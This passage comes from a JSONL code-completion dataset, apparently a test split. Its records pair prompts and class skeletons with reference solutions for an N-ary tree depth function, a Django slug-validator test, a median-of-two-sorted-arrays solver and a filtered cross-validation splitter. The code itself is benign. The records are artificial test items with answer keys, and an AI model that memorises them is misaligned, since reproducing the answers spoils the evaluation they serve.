1])\nreturn max_depth"], "bodies_text": "<|body_start_0|>\n if root == None:\n return 0\n max_sub_depth = 0\n for node in root.children:\n cur_depth = self.maxDepthWithRecursion(node)\n max_sub_depth = max(cur_depth, max_sub_depth)\n return max_sub_depth + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if root == None:\n return 0\n max_depth = 0\n queue = []\n queue.append([root, 1])\n while len(queue) > 0:\n node, depth = queue.pop(0)\n max_depth = max(max_depth, depth)\n for sub_node in node.children:\n queue.append([sub_node, depth + 1])\n return max_depth\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxDepthWithRecursion(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n <|body_0|>\n\n def maxDepthWithQueue(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root == None:\n return 0\n max_sub_depth = 0\n for node in root.children:\n cur_depth = self.maxDepthWithRecursion(node)\n max_sub_depth = max(cur_depth, max_sub_depth)\n return max_sub_depth + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if root == None:\n return 0\n max_depth = 0\n queue = []\n queue.append([root, 1])\n while len(queue) > 0:\n node, depth = queue.pop(0)\n max_depth = max(max_depth, depth)\n for sub_node in node.children:\n queue.append([sub_node, depth + 1])\n return max_depth\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000441", "length_bytes": 1003, "license_type": "no_license", "methods": [{"docstring": ":type root: Node :rtype: int", "name": "maxDepthWithRecursion", "signature": "def maxDepthWithRecursion(self, root)"}, {"docstring": ":type root: Node :rtype: int", "name": "maxDepthWithQueue", "signature": "def maxDepthWithQueue(self, root)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001257", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxDepthWithRecursion(self, root): :type root: Node :rtype: int\n- def maxDepthWithQueue(self, root): :type root: Node :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxDepthWithRecursion(self, root): :type root: Node :rtype: int\n- def maxDepthWithQueue(self, root): :type root: Node :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def maxDepthWithRecursion(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n <|body_0|>\n\n def maxDepthWithQueue(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root == None:\n return 0\n max_sub_depth = 0\n for node in root.children:\n cur_depth = self.maxDepthWithRecursion(node)\n max_sub_depth = max(cur_depth, max_sub_depth)\n return max_sub_depth + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if root == None:\n return 0\n max_depth = 0\n queue = []\n queue.append([root, 1])\n while len(queue) > 0:\n node, depth = queue.pop(0)\n max_depth = max(max_depth, depth)\n for sub_node in node.children:\n queue.append([sub_node, depth + 1])\n return max_depth\n<|end_body_1|>\n", "revision_id": "176cc1db3291843fb068f06d0180766dd8c3122c", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxDepthWithRecursion(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n <|body_0|>\n\n def maxDepthWithQueue(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxDepthWithRecursion(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n if root == None:\n return 0\n max_sub_depth = 0\n for node in root.children:\n cur_depth = self.maxDepthWithRecursion(node)\n max_sub_depth = max(cur_depth, max_sub_depth)\n return max_sub_depth + 1\n\n def maxDepthWithQueue(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n if root == None:\n return 0\n max_depth = 0\n queue = []\n queue.append([root, 1])\n while len(queue) > 0:\n node, depth = queue.pop(0)\n max_depth = max(max_depth, depth)\n for sub_node in node.children:\n queue.append([sub_node, depth + 1])\n return max_depth\n", "source": "the_stack_v2_python_sparse", "source_path": "2020/tree/maximum_depth_of_n_ary_tree_559.py", "source_repo": "yehongyu/acode", "split": "test", "star_events_count": 0} {"blob_id": "e6164e470ea8b3e7fb60a21db9dd465ee5738e07", "bodies": ["with self.assertRaises(ValidationError):\n miner = Miner(name='Some Miner', version='1.0.0', slug='create')\n miner.full_clean()\n miner.save()", "miner = Miner(name='Some Miner', version='1.0.0', slug='some-miner-slug')\nminer.full_clean()\nminer.save()"], "bodies_text": "<|body_start_0|>\n with self.assertRaises(ValidationError):\n miner = Miner(name='Some Miner', version='1.0.0', slug='create')\n miner.full_clean()\n miner.save()\n<|end_body_0|>\n\n<|body_start_1|>\n miner = Miner(name='Some Miner', version='1.0.0', slug='some-miner-slug')\n miner.full_clean()\n miner.save()\n<|end_body_1|>\n", "class_docstring": "Тестирование валидатора slug", "class_name": "SlugValidatorTest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SlugValidatorTest:\n \"\"\"Тестирование валидатора slug\"\"\"\n\n def test_validate_invalid_slug(self):\n \"\"\"Тестирование invalid slug\"\"\"\n <|body_0|>\n\n def test_validate_valid_slug(self):\n \"\"\"Тестирование valid slug\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n with self.assertRaises(ValidationError):\n miner = Miner(name='Some Miner', version='1.0.0', slug='create')\n miner.full_clean()\n miner.save()\n<|end_body_0|>\n\n<|body_start_1|>\n miner = Miner(name='Some Miner', version='1.0.0', slug='some-miner-slug')\n miner.full_clean()\n miner.save()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000442", "length_bytes": 13105, "license_type": "permissive", "methods": [{"docstring": "Тестирование invalid slug", "name": "test_validate_invalid_slug", "signature": "def test_validate_invalid_slug(self)"}, {"docstring": "Тестирование valid slug", "name": "test_validate_valid_slug", "signature": "def test_validate_valid_slug(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004703", "prompt": "Implement the Python class `SlugValidatorTest` described below.\n\nClass description:\nТестирование валидатора slug\n\nMethod signatures and docstrings:\n- def test_validate_invalid_slug(self): Тестирование invalid slug\n- def test_validate_valid_slug(self): Тестирование valid slug", "prompted_full_text": "Implement the Python class `SlugValidatorTest` described below.\n\nClass description:\nТестирование валидатора slug\n\nMethod signatures and docstrings:\n- def test_validate_invalid_slug(self): Тестирование invalid slug\n- def test_validate_valid_slug(self): Тестирование valid slug\n\n<|skeleton|>\nclass SlugValidatorTest:\n \"\"\"Тестирование валидатора slug\"\"\"\n\n def test_validate_invalid_slug(self):\n \"\"\"Тестирование invalid slug\"\"\"\n <|body_0|>\n\n def test_validate_valid_slug(self):\n \"\"\"Тестирование valid slug\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n with self.assertRaises(ValidationError):\n miner = Miner(name='Some Miner', version='1.0.0', slug='create')\n miner.full_clean()\n miner.save()\n<|end_body_0|>\n\n<|body_start_1|>\n miner = Miner(name='Some Miner', version='1.0.0', slug='some-miner-slug')\n miner.full_clean()\n miner.save()\n<|end_body_1|>\n", "revision_id": "d173f1bee44d0752eefb53b1a0da847a3882a352", "skeleton": "<|skeleton|>\nclass SlugValidatorTest:\n \"\"\"Тестирование валидатора slug\"\"\"\n\n def test_validate_invalid_slug(self):\n \"\"\"Тестирование invalid slug\"\"\"\n <|body_0|>\n\n def test_validate_valid_slug(self):\n \"\"\"Тестирование valid slug\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SlugValidatorTest:\n \"\"\"Тестирование валидатора slug\"\"\"\n\n def test_validate_invalid_slug(self):\n \"\"\"Тестирование invalid slug\"\"\"\n with self.assertRaises(ValidationError):\n miner = Miner(name='Some Miner', version='1.0.0', slug='create')\n miner.full_clean()\n miner.save()\n\n def test_validate_valid_slug(self):\n \"\"\"Тестирование valid slug\"\"\"\n miner = Miner(name='Some Miner', version='1.0.0', slug='some-miner-slug')\n miner.full_clean()\n miner.save()\n", "source": "the_stack_v2_python_sparse", "source_path": "miningstatistic/core/tests.py", "source_repo": "crowmurk/miners", "split": "test", "star_events_count": 0} {"blob_id": "3129433c1ee56338d3e7aecd45e77590651e34b2", "bodies": ["m, n = (len(nums1), len(nums2))\nif m == 0:\n if n & 1 == 0:\n return (nums2[n // 2] + nums2[n // 2 - 1]) / 2\n return nums2[n // 2]\nif n == 0:\n if m & 1 == 0:\n return (nums1[m // 2] + nums1[m // 2 - 1]) / 2\n return nums1[m // 2]\ntotal = m + n\nif total & 1 == 1:\n return self.find_k(nums1, 0, nums2, 0, total // 2 + 1)\nreturn (self.find_k(nums1, 0, nums2, 0, total // 2) + self.find_k(nums1, 0, nums2, 0, total // 2 + 1)) / 2", "if a_begin >= len(a):\n return b[b_begin + k - 1]\nif b_begin >= len(b):\n return a[a_begin + k - 1]\nif k == 1:\n return min(a[a_begin], b[b_begin])\nmid_a = mid_b = max(a[-1], b[-1]) + 1\nif a_begin + k // 2 - 1 < len(a):\n mid_a = a[a_begin + k // 2 - 1]\nif b_begin + k // 2 - 1 < len(b):\n mid_b = b[b_begin + k // 2 - 1]\nif mid_a <= mid_b:\n return self.find_k(a, a_begin + k // 2, b, b_begin, k - k // 2)\nreturn self.find_k(a, a_begin, b, b_begin + k // 2, k - k // 2)", "new_list = list()\ni = j = 0\nwhile i < len(nums1) and j < len(nums2):\n if nums1[i] <= nums2[j]:\n new_list.append(nums1[i])\n i += 1\n else:\n new_list.append(nums2[j])\n j += 1\nwhile i < len(nums1):\n new_list.append(nums1[i])\n i += 1\nwhile j < len(nums2):\n new_list.append(nums2[j])\n j += 1\nif len(new_list) % 2 == 0:\n middle = len(new_list) // 2\n return (new_list[middle - 1] + new_list[middle]) / 2\nelse:\n return new_list[len(new_list) // 2]"], "bodies_text": "<|body_start_0|>\n m, n = (len(nums1), len(nums2))\n if m == 0:\n if n & 1 == 0:\n return (nums2[n // 2] + nums2[n // 2 - 1]) / 2\n return nums2[n // 2]\n if n == 0:\n if m & 1 == 0:\n return (nums1[m // 2] + nums1[m // 2 - 1]) / 2\n return nums1[m // 2]\n total = m + n\n if total & 1 == 1:\n return self.find_k(nums1, 0, nums2, 0, total // 2 + 1)\n return (self.find_k(nums1, 0, nums2, 0, total // 2) + self.find_k(nums1, 0, nums2, 0, total // 2 + 1)) / 2\n<|end_body_0|>\n\n<|body_start_1|>\n if a_begin >= len(a):\n return b[b_begin + k - 1]\n if b_begin >= len(b):\n return a[a_begin + k - 1]\n if k == 1:\n return min(a[a_begin], b[b_begin])\n mid_a = mid_b = max(a[-1], b[-1]) + 1\n if a_begin + k // 2 - 1 < len(a):\n mid_a = a[a_begin + k // 2 - 1]\n if b_begin + k // 2 - 1 < len(b):\n mid_b = b[b_begin + k // 2 - 1]\n if mid_a <= mid_b:\n return self.find_k(a, a_begin + k // 2, b, b_begin, k - k // 2)\n return self.find_k(a, a_begin, b, b_begin + k // 2, k - k // 2)\n<|end_body_1|>\n\n<|body_start_2|>\n new_list = list()\n i = j = 0\n while i < len(nums1) and j < len(nums2):\n if nums1[i] <= nums2[j]:\n new_list.append(nums1[i])\n i += 1\n else:\n new_list.append(nums2[j])\n j += 1\n while i < len(nums1):\n new_list.append(nums1[i])\n i += 1\n while j < len(nums2):\n new_list.append(nums2[j])\n j += 1\n if len(new_list) % 2 == 0:\n middle = len(new_list) // 2\n return (new_list[middle - 1] + new_list[middle]) / 2\n else:\n return new_list[len(new_list) // 2]\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"两个有序数组求中位数,问题一般化为,求两个有序数组的第k个数,当k = (m+n)/2时为原问题的解。 怎么求第k个数?分别求出第一个和第二个数组的第 k / 2个数 a 和 b,然后比较 a 和 b,当a < b , 说明第 k 个数位于 a数组的第 k / 2个数后半段,或者b数组的 第 k / 2 个数前半段,问题规模缩小了一半, 然后递归处理就行。 时间复杂度是 O(log(m+n)) :param nums1: :param nums2: :return:\"\"\"\n <|body_0|>\n\n def find_k(self, a, a_begin, b, b_begin, k):\n \"\"\"寻找数组a和数组b中,第k个数字\"\"\"\n <|body_1|>\n\n def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"中位数是左右两个的数的个数相等,如果是偶数个就取中间两个数的和除以2 这个时间复杂度不满足O(long(m+n)) m,n为两个数组的长度 :param nums1: :param nums2: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m, n = (len(nums1), len(nums2))\n if m == 0:\n if n & 1 == 0:\n return (nums2[n // 2] + nums2[n // 2 - 1]) / 2\n return nums2[n // 2]\n if n == 0:\n if m & 1 == 0:\n return (nums1[m // 2] + nums1[m // 2 - 1]) / 2\n return nums1[m // 2]\n total = m + n\n if total & 1 == 1:\n return self.find_k(nums1, 0, nums2, 0, total // 2 + 1)\n return (self.find_k(nums1, 0, nums2, 0, total // 2) + self.find_k(nums1, 0, nums2, 0, total // 2 + 1)) / 2\n<|end_body_0|>\n\n<|body_start_1|>\n if a_begin >= len(a):\n return b[b_begin + k - 1]\n if b_begin >= len(b):\n return a[a_begin + k - 1]\n if k == 1:\n return min(a[a_begin], b[b_begin])\n mid_a = mid_b = max(a[-1], b[-1]) + 1\n if a_begin + k // 2 - 1 < len(a):\n mid_a = a[a_begin + k // 2 - 1]\n if b_begin + k // 2 - 1 < len(b):\n mid_b = b[b_begin + k // 2 - 1]\n if mid_a <= mid_b:\n return self.find_k(a, a_begin + k // 2, b, b_begin, k - k // 2)\n return self.find_k(a, a_begin, b, b_begin + k // 2, k - k // 2)\n<|end_body_1|>\n\n<|body_start_2|>\n new_list = list()\n i = j = 0\n while i < len(nums1) and j < len(nums2):\n if nums1[i] <= nums2[j]:\n new_list.append(nums1[i])\n i += 1\n else:\n new_list.append(nums2[j])\n j += 1\n while i < len(nums1):\n new_list.append(nums1[i])\n i += 1\n while j < len(nums2):\n new_list.append(nums2[j])\n j += 1\n if len(new_list) % 2 == 0:\n middle = len(new_list) // 2\n return (new_list[middle - 1] + new_list[middle]) / 2\n else:\n return new_list[len(new_list) // 2]\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000443", "length_bytes": 3908, "license_type": "no_license", "methods": [{"docstring": "两个有序数组求中位数,问题一般化为,求两个有序数组的第k个数,当k = (m+n)/2时为原问题的解。 怎么求第k个数?分别求出第一个和第二个数组的第 k / 2个数 a 和 b,然后比较 a 和 b,当a < b , 说明第 k 个数位于 a数组的第 k / 2个数后半段,或者b数组的 第 k / 2 个数前半段,问题规模缩小了一半, 然后递归处理就行。 时间复杂度是 O(log(m+n)) :param nums1: :param nums2: :return:", "name": "findMedianSortedArrays", "signature": "def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float"}, {"docstring": "寻找数组a和数组b中,第k个数字", "name": "find_k", "signature": "def find_k(self, a, a_begin, b, b_begin, k)"}, {"docstring": "中位数是左右两个的数的个数相等,如果是偶数个就取中间两个数的和除以2 这个时间复杂度不满足O(long(m+n)) m,n为两个数组的长度 :param nums1: :param nums2: :return:", "name": "findMedianSortedArrays1", "signature": "def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006041", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float: 两个有序数组求中位数,问题一般化为,求两个有序数组的第k个数,当k = (m+n)/2时为原问题的解。 怎么求第k个数?分别求出第一个和第二个数组的第 k / 2个数 a 和 b,然后比较 a 和 b,当a < b , 说明第 k 个数位于 a数组的第 k / 2个数后半段,或者b数组的 第 k / 2 个数前半段,问题规模缩小了一半, 然后递归处理就行。 时间复杂度是 O(log(m+n)) :param nums1: :param nums2: :return:\n- def find_k(self, a, a_begin, b, b_begin, k): 寻找数组a和数组b中,第k个数字\n- def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float: 中位数是左右两个的数的个数相等,如果是偶数个就取中间两个数的和除以2 这个时间复杂度不满足O(long(m+n)) m,n为两个数组的长度 :param nums1: :param nums2: :return:", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float: 两个有序数组求中位数,问题一般化为,求两个有序数组的第k个数,当k = (m+n)/2时为原问题的解。 怎么求第k个数?分别求出第一个和第二个数组的第 k / 2个数 a 和 b,然后比较 a 和 b,当a < b , 说明第 k 个数位于 a数组的第 k / 2个数后半段,或者b数组的 第 k / 2 个数前半段,问题规模缩小了一半, 然后递归处理就行。 时间复杂度是 O(log(m+n)) :param nums1: :param nums2: :return:\n- def find_k(self, a, a_begin, b, b_begin, k): 寻找数组a和数组b中,第k个数字\n- def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float: 中位数是左右两个的数的个数相等,如果是偶数个就取中间两个数的和除以2 这个时间复杂度不满足O(long(m+n)) m,n为两个数组的长度 :param nums1: :param nums2: :return:\n\n<|skeleton|>\nclass Solution:\n\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"两个有序数组求中位数,问题一般化为,求两个有序数组的第k个数,当k = (m+n)/2时为原问题的解。 怎么求第k个数?分别求出第一个和第二个数组的第 k / 2个数 a 和 b,然后比较 a 和 b,当a < b , 说明第 k 个数位于 a数组的第 k / 2个数后半段,或者b数组的 第 k / 2 个数前半段,问题规模缩小了一半, 然后递归处理就行。 时间复杂度是 O(log(m+n)) :param nums1: :param nums2: :return:\"\"\"\n <|body_0|>\n\n def find_k(self, a, a_begin, b, b_begin, k):\n \"\"\"寻找数组a和数组b中,第k个数字\"\"\"\n <|body_1|>\n\n def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"中位数是左右两个的数的个数相等,如果是偶数个就取中间两个数的和除以2 这个时间复杂度不满足O(long(m+n)) m,n为两个数组的长度 :param nums1: :param nums2: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m, n = (len(nums1), len(nums2))\n if m == 0:\n if n & 1 == 0:\n return (nums2[n // 2] + nums2[n // 2 - 1]) / 2\n return nums2[n // 2]\n if n == 0:\n if m & 1 == 0:\n return (nums1[m // 2] + nums1[m // 2 - 1]) / 2\n return nums1[m // 2]\n total = m + n\n if total & 1 == 1:\n return self.find_k(nums1, 0, nums2, 0, total // 2 + 1)\n return (self.find_k(nums1, 0, nums2, 0, total // 2) + self.find_k(nums1, 0, nums2, 0, total // 2 + 1)) / 2\n<|end_body_0|>\n\n<|body_start_1|>\n if a_begin >= len(a):\n return b[b_begin + k - 1]\n if b_begin >= len(b):\n return a[a_begin + k - 1]\n if k == 1:\n return min(a[a_begin], b[b_begin])\n mid_a = mid_b = max(a[-1], b[-1]) + 1\n if a_begin + k // 2 - 1 < len(a):\n mid_a = a[a_begin + k // 2 - 1]\n if b_begin + k // 2 - 1 < len(b):\n mid_b = b[b_begin + k // 2 - 1]\n if mid_a <= mid_b:\n return self.find_k(a, a_begin + k // 2, b, b_begin, k - k // 2)\n return self.find_k(a, a_begin, b, b_begin + k // 2, k - k // 2)\n<|end_body_1|>\n\n<|body_start_2|>\n new_list = list()\n i = j = 0\n while i < len(nums1) and j < len(nums2):\n if nums1[i] <= nums2[j]:\n new_list.append(nums1[i])\n i += 1\n else:\n new_list.append(nums2[j])\n j += 1\n while i < len(nums1):\n new_list.append(nums1[i])\n i += 1\n while j < len(nums2):\n new_list.append(nums2[j])\n j += 1\n if len(new_list) % 2 == 0:\n middle = len(new_list) // 2\n return (new_list[middle - 1] + new_list[middle]) / 2\n else:\n return new_list[len(new_list) // 2]\n<|end_body_2|>\n", "revision_id": "971cc2f674d53cf33a621a3a608f32a53603438a", "skeleton": "<|skeleton|>\nclass Solution:\n\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"两个有序数组求中位数,问题一般化为,求两个有序数组的第k个数,当k = (m+n)/2时为原问题的解。 怎么求第k个数?分别求出第一个和第二个数组的第 k / 2个数 a 和 b,然后比较 a 和 b,当a < b , 说明第 k 个数位于 a数组的第 k / 2个数后半段,或者b数组的 第 k / 2 个数前半段,问题规模缩小了一半, 然后递归处理就行。 时间复杂度是 O(log(m+n)) :param nums1: :param nums2: :return:\"\"\"\n <|body_0|>\n\n def find_k(self, a, a_begin, b, b_begin, k):\n \"\"\"寻找数组a和数组b中,第k个数字\"\"\"\n <|body_1|>\n\n def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"中位数是左右两个的数的个数相等,如果是偶数个就取中间两个数的和除以2 这个时间复杂度不满足O(long(m+n)) m,n为两个数组的长度 :param nums1: :param nums2: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"两个有序数组求中位数,问题一般化为,求两个有序数组的第k个数,当k = (m+n)/2时为原问题的解。 怎么求第k个数?分别求出第一个和第二个数组的第 k / 2个数 a 和 b,然后比较 a 和 b,当a < b , 说明第 k 个数位于 a数组的第 k / 2个数后半段,或者b数组的 第 k / 2 个数前半段,问题规模缩小了一半, 然后递归处理就行。 时间复杂度是 O(log(m+n)) :param nums1: :param nums2: :return:\"\"\"\n m, n = (len(nums1), len(nums2))\n if m == 0:\n if n & 1 == 0:\n return (nums2[n // 2] + nums2[n // 2 - 1]) / 2\n return nums2[n // 2]\n if n == 0:\n if m & 1 == 0:\n return (nums1[m // 2] + nums1[m // 2 - 1]) / 2\n return nums1[m // 2]\n total = m + n\n if total & 1 == 1:\n return self.find_k(nums1, 0, nums2, 0, total // 2 + 1)\n return (self.find_k(nums1, 0, nums2, 0, total // 2) + self.find_k(nums1, 0, nums2, 0, total // 2 + 1)) / 2\n\n def find_k(self, a, a_begin, b, b_begin, k):\n \"\"\"寻找数组a和数组b中,第k个数字\"\"\"\n if a_begin >= len(a):\n return b[b_begin + k - 1]\n if b_begin >= len(b):\n return a[a_begin + k - 1]\n if k == 1:\n return min(a[a_begin], b[b_begin])\n mid_a = mid_b = max(a[-1], b[-1]) + 1\n if a_begin + k // 2 - 1 < len(a):\n mid_a = a[a_begin + k // 2 - 1]\n if b_begin + k // 2 - 1 < len(b):\n mid_b = b[b_begin + k // 2 - 1]\n if mid_a <= mid_b:\n return self.find_k(a, a_begin + k // 2, b, b_begin, k - k // 2)\n return self.find_k(a, a_begin, b, b_begin + k // 2, k - k // 2)\n\n def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"中位数是左右两个的数的个数相等,如果是偶数个就取中间两个数的和除以2 这个时间复杂度不满足O(long(m+n)) m,n为两个数组的长度 :param nums1: :param nums2: :return:\"\"\"\n new_list = list()\n i = j = 0\n while i < len(nums1) and j < len(nums2):\n if nums1[i] <= nums2[j]:\n new_list.append(nums1[i])\n i += 1\n else:\n new_list.append(nums2[j])\n j += 1\n while i < len(nums1):\n new_list.append(nums1[i])\n i += 1\n while j < len(nums2):\n new_list.append(nums2[j])\n j += 1\n if len(new_list) % 2 == 0:\n middle = len(new_list) // 2\n return (new_list[middle - 1] + new_list[middle]) / 2\n else:\n return new_list[len(new_list) // 2]\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCode/困难/4寻找两个有序数组的中位数.py", "source_repo": "xiyangxitian1/learn_days", "split": "test", "star_events_count": 0} {"blob_id": "eb90e6cd01b97c3c8dc0d6d859b269d6be558285", "bodies": ["super(FilteredLeaveOneGroupOut, self).__init__()\nself.keep = keep\nself.example_ids = example_ids\nself._warned = False\nself.logger = logger if logger else logging.getLogger(__name__)", "for train_index, test_index in super(FilteredLeaveOneGroupOut, self).split(X, y, groups):\n train_len = len(train_index)\n test_len = len(test_index)\n train_index = [i for i in train_index if self.example_ids[i] in self.keep]\n test_index = [i for i in test_index if self.example_ids[i] in self.keep]\n if not self._warned and (train_len != len(train_index) or test_len != len(test_index)):\n self.logger.warning('Feature set contains IDs that are not in folds dictionary. Skipping those IDs.')\n self._warned = True\n yield (train_index, test_index)"], "bodies_text": "<|body_start_0|>\n super(FilteredLeaveOneGroupOut, self).__init__()\n self.keep = keep\n self.example_ids = example_ids\n self._warned = False\n self.logger = logger if logger else logging.getLogger(__name__)\n<|end_body_0|>\n\n<|body_start_1|>\n for train_index, test_index in super(FilteredLeaveOneGroupOut, self).split(X, y, groups):\n train_len = len(train_index)\n test_len = len(test_index)\n train_index = [i for i in train_index if self.example_ids[i] in self.keep]\n test_index = [i for i in test_index if self.example_ids[i] in self.keep]\n if not self._warned and (train_len != len(train_index) or test_len != len(test_index)):\n self.logger.warning('Feature set contains IDs that are not in folds dictionary. Skipping those IDs.')\n self._warned = True\n yield (train_index, test_index)\n<|end_body_1|>\n", "class_docstring": "Custom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.", "class_name": "FilteredLeaveOneGroupOut", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FilteredLeaveOneGroupOut:\n \"\"\"Custom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\"\"\"\n\n def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None):\n \"\"\"Initialize the model.\"\"\"\n <|body_0|>\n\n def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator:\n \"\"\"Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(FilteredLeaveOneGroupOut, self).__init__()\n self.keep = keep\n self.example_ids = example_ids\n self._warned = False\n self.logger = logger if logger else logging.getLogger(__name__)\n<|end_body_0|>\n\n<|body_start_1|>\n for train_index, test_index in super(FilteredLeaveOneGroupOut, self).split(X, y, groups):\n train_len = len(train_index)\n test_len = len(test_index)\n train_index = [i for i in train_index if self.example_ids[i] in self.keep]\n test_index = [i for i in test_index if self.example_ids[i] in self.keep]\n if not self._warned and (train_len != len(train_index) or test_len != len(test_index)):\n self.logger.warning('Feature set contains IDs that are not in folds dictionary. Skipping those IDs.')\n self._warned = True\n yield (train_index, test_index)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000444", "length_bytes": 47118, "license_type": "permissive", "methods": [{"docstring": "Initialize the model.", "name": "__init__", "signature": "def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None)"}, {"docstring": "Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.", "name": "split", "signature": "def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000932", "prompt": "Implement the Python class `FilteredLeaveOneGroupOut` described below.\n\nClass description:\nCustom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\n\nMethod signatures and docstrings:\n- def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None): Initialize the model.\n- def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator: Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.", "prompted_full_text": "Implement the Python class 